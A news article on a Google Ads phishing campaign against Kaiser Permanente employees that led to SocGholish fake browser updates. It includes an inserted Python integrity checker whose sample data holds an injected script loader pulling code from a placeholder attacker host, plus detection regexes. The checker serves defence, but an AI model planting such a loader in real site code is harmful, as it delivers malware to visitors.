
Phishing campaign targets Kaiser Permanente employees using Google Ads


Cybercriminals launched a malicious campaign targeting Kaiser Permanente employees, leveraging Google Search Ads to masquerade as the healthcare company’s HR portal. The campaign, uncovered on December 15, highlights the growing threat posed by search engine ad abuse and overlapping malicious campaigns.

The fraudulent Google ad appeared when users searched for Kaiser Permanente’s HR portal, a critical resource for employees to access benefits and paystubs. However, instead of leading to the legitimate site, clicking on the ad redirected users to a hijacked website belonging to a defunct Romanian company, Bellona Software.

This compromised website briefly displayed a fake Kaiser Permanente login page before redirecting users to a different screen, urging them to update their browsers. The supposed browser update was part of ‘SocGholish,’ a notorious malware campaign designed to trick victims into downloading and executing malicious scripts.

“We believe the threat actors’ intent was to phish KP employees for their login credentials, but something unexpected happened. Instead, victims who clicked on the ad were redirected to a compromised website that prompted them to update their browser,” the researchers noted.

Sponsored ad showcasing hijacked Romanian software company website. | Source: Malwarebytes

While the campaign’s initial goal appeared to be credential theft from Kaiser Permanente employees, the overlapping presence of ‘SocGholish’ malware introduced a different layer of complexity. It seems that the website used in the phishing attack had already been compromised by a criminal syndicate injecting malicious code into its core JavaScript libraries.

As a result, victims who interacted with the phishing site unknowingly encountered ‘SocGholish.’ This malware campaign uses fake browser updates to collect user data and install additional tools like Cobalt Strike for deeper system compromise, particularly if the victim’s device is deemed valuable enough for a human-operated attack.
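The SocGholish foothold described above came from malicious code injected into the compromised site’s own JavaScript libraries. The following is an added example, not code from the article or from Malwarebytes, of the kind of integrity check a site owner can run to catch such tampering: it compares the JavaScript actually served against SHA-256 hashes recorded at deploy time, and flags any modified or unexpected file that contains a dynamically inserted script loader pointing at a host outside an allow-list. All file contents and hostnames are constructed placeholders.

```python
import hashlib
import re

# Constructed sample content standing in for a site's core JavaScript libraries.
# CLEAN_FILES is what the site owner deployed; SERVED_FILES is what the web server
# hands out now. One served file has an appended remote script loader of the kind
# used to deliver fake browser-update lures. Hostnames are placeholders.
CLEAN_FILES = {
    "js/jquery.min.js": b"/*! jQuery stand-in */ window.$ = function(s){return document.querySelector(s);};\n",
    "js/app.js": b"document.addEventListener('DOMContentLoaded', function(){ console.log('ready'); });\n",
}

SERVED_FILES = {
    "js/jquery.min.js": CLEAN_FILES["js/jquery.min.js"]
    + b";(function(){var s=document.createElement('script');"
    + b"s.src='https://cdn.attacker-placeholder.invalid/update.js';document.head.appendChild(s);})();\n",
    "js/app.js": CLEAN_FILES["js/app.js"],
    "js/extra.js": b"/* file that was never part of the deployment */\n",
}


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_baseline(files):
    """Record a SHA-256 per file at deploy time; this is the trusted reference."""
    return {name: sha256_hex(content) for name, content in files.items()}


def check_integrity(baseline, served):
    """Compare what the server hands out against the baseline.

    Returns {path: 'ok' | 'modified' | 'missing' | 'unexpected'}.
    """
    report = {}
    for path, expected in baseline.items():
        if path not in served:
            report[path] = "missing"
        elif sha256_hex(served[path]) != expected:
            report[path] = "modified"
        else:
            report[path] = "ok"
    for path in served:
        if path not in baseline:
            report[path] = "unexpected"
    return report


# Heuristic patterns for a dynamically inserted <script> element whose source is off-site.
# A match is a lead for a human to review, not proof of compromise.
LOADER_PATTERN = re.compile(rb"createElement\(['\"]script['\"]\)")
SRC_PATTERN = re.compile(rb"\.src\s*=\s*['\"](https?://[^'\"]+)['\"]")


def find_remote_loaders(content: bytes, allowed_hosts):
    """Return the URLs of script loaders whose host is not in allowed_hosts."""
    if not LOADER_PATTERN.search(content):
        return []
    findings = []
    for m in SRC_PATTERN.finditer(content):
        url = m.group(1).decode("utf-8", "replace")
        host = url.split("//", 1)[1].split("/", 1)[0]
        if host not in allowed_hosts:
            findings.append(url)
    return findings


def audit(baseline, served, allowed_hosts):
    """Integrity check, plus the loader heuristic on every modified or unexpected file."""
    report = check_integrity(baseline, served)
    details = {}
    for path, status in report.items():
        loaders = []
        if status in ("modified", "unexpected"):
            loaders = find_remote_loaders(served[path], allowed_hosts)
        details[path] = {"status": status, "remote_loaders": loaders}
    return details


if __name__ == "__main__":
    baseline = build_baseline(CLEAN_FILES)
    for path, info in audit(baseline, SERVED_FILES, {"www.example-site.invalid"}).items():
        print(path, info)
```

In practice the baseline would be generated in the deployment pipeline and the served copies fetched over HTTPS on a schedule; a "modified" status on a library that the site never updates is the signal worth paging on, and the loader heuristic only narrows down where to look first.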

SocGholish malware was found on the Bellona Software website. | Source: Malwarebytes

The fake ad was traced to a fraudulent advertiser named ‘Heather Black.’ The ad campaign targeted U.S.-based search users, as confirmed through Google Ads Transparency reports.

The hijacked domain, bellonasoftware[.]com, had previously belonged to the now-defunct Romanian software company. Internet Archive snapshots reviewed by the researchers show it in legitimate use in 2021, before it fell into the hands of cybercriminals who turned it into a phishing hub.

Victims of this campaign faced dual risks — potential credential theft and malware infection — stemming from the abuse of Google’s ad platform. While Google has been notified about the malicious ad, the ongoing prevalence of similar scams highlights the challenges of maintaining a secure advertising ecosystem.

Researchers have advised users to exercise caution with sponsored search results, avoid clicking on ads that seem suspicious or lead to unfamiliar URLs, and use browser security tools for added protection.


Kumar Hemant


Deputy Editor at Candid.Technology. Hemant writes at the intersection of tech and culture and has a keen interest in science, social issues and international relations. You can contact him here: kumarhemant@pm.me
